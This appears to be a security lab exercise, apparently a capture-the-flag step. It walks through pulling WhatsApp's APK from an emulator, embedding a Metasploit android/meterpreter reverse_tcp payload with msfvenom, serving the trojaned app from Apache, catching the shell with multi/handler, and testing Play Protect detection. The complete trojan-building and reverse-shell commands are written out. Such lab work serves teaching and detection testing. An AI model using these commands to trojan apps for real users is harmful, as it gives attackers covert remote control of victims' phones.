Note
The latest version of WhatsApp no longer alllows this modification, as of 5-22-19. I recommend using the archived WhatsApp file, or one of these apps instead:
- Whole Foods
- Lyft
- Wells Fargo for Tablet
- Microsoft Translator
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the
"List of devices attached",
as shown below.
On Kali, execute these commands:
apt purge apktool -y
wget https://raw.githubusercontent.com/iBotPeaches/Apktool/master/scripts/linux/apktool
wget https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.4.0.jar
mv apktool_2.4.0.jar apktool.jar
mv apktool.jar /usr/bin
mv apktool /usr/bin
chmod +x /usr/bin/apktool*
apktool
You should see the "Apktool v2.4.0" help
message,
as shown below.
The commands may need some adjustment to work on your system. You need the output of each command to know what to put in the next one.
adb shell pm list packages | grep what
adb shell pm path com.whatsapp
adb pull /data/app/com.whatsapp-4ecBR8w_r7bateDGMM9YPg==/base.apk
The app should download,
as shown below.
msfvenom -l payloads | grep android
There are only a few payloads available,
as shown below.
On Kali, execute this command to find your IP address.
ifconfig
When I did it, the address was 172.16.123.180,
as shown below.
On Kali, execute this command to generate the malware, replacing the IP address with your Kali systems IP address:
msfvenom -x base.apk -p android/meterpreter/reverse_tcp LHOST=172.16.123.180 -f raw -o whatspwned.apk
The malware is generated,
as shown below.
On Kali, execute these commands to start a Web server and host your malicious app:
service apache2 start
cp whatspwned.apk /var/www/html
The malware is generated,
as shown below.
msfconsole -q
use multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit begins listening on port 4444,
as shown below.
Click UNINSTALL. Click OK.
Add the APK filename to the end of the IP address, as shown below. Your IP address will be different.
172.16.123.180/whatspwned.apk
A little box pops up at the bottom of the
phone, saying "whatspwned.apk downloaded",
as shown below. In that little box, click
OPEN.
It only appears for a few seconds, so you may need to repeat the process.
On your phone, click INSTALL. Click OPEN.
Click "Play Protect", as shown below.
On the next page, at the top right, click the gear icon.
In the "Scan device for security threats" line, on the right side, click the slider to activate it, as shown below.
At the top left, click the back-arrow. At the top right, click the curved arrow icon to launch a scan.
Play Protect shows the apps it's scanned, including the Trojaned WhatsApp. Play Protect did not detect the malware, as shown below.
Scan your phone. The malware is detected, as shown below. The flag is the covered by a green box in the image below.